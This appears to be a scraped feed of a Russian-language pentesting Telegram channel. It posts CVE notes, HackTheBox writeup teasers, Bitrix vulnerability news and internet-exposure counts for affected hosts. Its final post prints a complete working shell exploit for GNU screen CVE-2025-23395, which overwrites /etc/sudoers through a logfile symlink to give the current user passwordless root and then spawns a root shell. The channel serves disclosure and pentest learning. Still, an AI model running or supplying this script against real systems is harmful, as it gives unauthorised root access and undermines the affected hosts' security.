This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2025-22828
В Apache CloudStack 4.16.0 и более поздних версиях обнаружена проблема с нарушением контроля доступа, которая позволяет пользователям, знающим UUID ресурсов, читать или добавлять комментарии (аннотации) к ресурсам, к которым у них нет прав доступа. (PoC)
FOFA - 1180 results
Censys - 262 results
Shodan - 185 results
💫 @pentestnotes
В Apache CloudStack 4.16.0 и более поздних версиях обнаружена проблема с нарушением контроля доступа, которая позволяет пользователям, знающим UUID ресурсов, читать или добавлять комментарии (аннотации) к ресурсам, к которым у них нет прав доступа. (PoC)
FOFA - 1180 results
Censys - 262 results
Shodan - 185 results
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13
Hackthebox Cat Writeup
XSS —> SQLi —> Logs —> XSS (Again)
Зато научились воровать печеньки
Читать тут
#HackTheBox #Season7 #Writeup #medium
💫 @pentestnotes
XSS —> SQLi —> Logs —> XSS (Again)
Зато научились воровать печеньки
Читать тут
#HackTheBox #Season7 #Writeup #medium
Please open Telegram to view this post
VIEW IN TELEGRAM
😈11👍5🔥3
Hackthebox Titanic Writeup
LFI —> Gitea —> ImageMagick (CVE-2024-41817)
Читать тут
#HackTheBox #Season7 #Writeup #easy
💫 @pentestnotes
LFI —> Gitea —> ImageMagick (CVE-2024-41817)
Читать тут
#HackTheBox #Season7 #Writeup #easy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15❤🔥3👍3❤1🤔1
Forwarded from true_security
нашел и решил написать про небольшую фичу в BitrixVM:
https://telegra.ph/bitrixvm-lpe-iz-korobki-02-21
https://telegra.ph/bitrixvm-lpe-iz-korobki-02-21
Telegraph
bitrixvm lpe из коробки
Слово bitrix уже как 3 года в переводе с молдаванского означает рукалицо. Сегодня расскажу вам про интересную фичу bitrixvm. Возможно кто то из вас с этим сталкивался, для меня это было новым. После получения доступа к серверу с bitrix мы обычно имеем права…
👍8😱5🔥4
На VK security confub показали как правильно писать bb отчёты, чтобы их максимально быстро протриажили
🔥10🌚7👾2
В официальном репозитории Kali Linux появилась версия 2025.1. Ждём официального релиза со списком изменений
https://cdimage.kali.org/kali-2025.1a/
https://cdimage.kali.org/kali-2025.1a/
🔥15👾4❤🔥3👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Подготовил для вас самый большой на данный момент гайд по тестированию CMS Bitrix. 😈
➡️ Причем, в статье я не только показал все существующие на данный момент известные методы и техники поиска уязвимостей в битриксе, но и поделился своими уникальными наработками. Включая атаки на кастомные модули и анонс собственного сканера под CMS Bitrix.
➡️ Также добавил материалы по структуре модулей и матчасть по самому Битриксу. Даже если вы только знакомитесь с этой CMS, после прочтения точно что-нибудь найдете)🥤
Ссылка на статью
💫 @pentestnotes | #pentest #bitrix
Ссылка на статью
Please open Telegram to view this post
VIEW IN TELEGRAM
❤36🔥26👍14
29 апреля в московском офисе Авито прошел Avito Security meetup.
В основном были темы про appsec, SOC, LLM, но помимо этого, ещё рассказали про интересный кейс взлома WiFi
Ссылка на запись
💫 @pentestnotes
В основном были темы про appsec, SOC, LLM, но помимо этого, ещё рассказали про интересный кейс взлома WiFi
Ссылка на запись
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16❤5😱5🥰1🤯1
🚨Очередная критическая RCE уязвимость в модулях для CMS Bitrix стороннего разработчика Esolutions (BDU:2025-03006)
На этот раз уязвимость нашли в плагинах «Экспорт/Импорт товаров в Excel». Эксплуатация уязвимости позволяет выполнять произвольные команды на сервере путём отправки специально сформированного POST-запроса.
Данной RCE уязвимости потенциально подвержены более 6000 веб-ресурсов.
Критичность - 8,8/10 CVSS 3.0
Подробнее рассказал тут
#bitrix #rce
💫 @pentestnotes
На этот раз уязвимость нашли в плагинах «Экспорт/Импорт товаров в Excel». Эксплуатация уязвимости позволяет выполнять произвольные команды на сервере путём отправки специально сформированного POST-запроса.
Данной RCE уязвимости потенциально подвержены более 6000 веб-ресурсов.
Критичность - 8,8/10 CVSS 3.0
Подробнее рассказал тут
#bitrix #rce
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥21👍6🤯4
Уязвимость в GNU screen, позволяющая выполнить код с правами root (CVE-2025-23395)
Уязвимость вызвана тем, что при запуске с правами root функция logfile_reopen() выполняется до сброса привилегий, но обрабатывает данные в контексте каталогов текущего непривилегированного пользователя, запустившего screen. Примечательно, что начальное открытие лога производится с корректным сбросом привилегий, но при повторном открытии файла с логом сброс привилегий не производится.
Exploit:
Источники:
- https://www.opennet.ru/opennews/art.shtml?num=63226
- https://haxx.in/files/limit-your-screentime.sh
💫 @pentestnotes
Уязвимость вызвана тем, что при запуске с правами root функция logfile_reopen() выполняется до сброса привилегий, но обрабатывает данные в контексте каталогов текущего непривилегированного пользователя, запустившего screen. Примечательно, что начальное открытие лога производится с корректным сбросом привилегий, но при повторном открытии файла с логом сброс привилегий не производится.
Exploit:
#!/bin/sh
# screen CVE-2025-23395 exploit
# blablabla
# blasty <[email protected]>
F=$(mktemp)
L=${HOME}/screen.log
T=/etc/sudoers
rm -rf $F $L
mkfifo $F
O=$(stat --printf="%s" $T)
echo "[+] spawning GNU screen"
screen -L -Logfile $L -dmS hax sh -c "cat $F"
while [ ! -f $L ]; do sleep 0.1; done
echo "[+] logfile appeared, doing hax"
rm $L
ln -s $T $L
P="${USER} ALL=(ALL) NOPASSWD:ALL"
(echo $P; for i in `seq 8192`; do echo; done) > $F
if [ $(stat --printf="%s" $T) -gt $O ] ; then
echo "[+] bl1ng bl1ng, we got it"
sudo sh
else
echo "[-] exploit failed :("
fi
rm -rf $F $L
Источники:
- https://www.opennet.ru/opennews/art.shtml?num=63226
- https://haxx.in/files/limit-your-screentime.sh
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥15👍7🤯3🗿1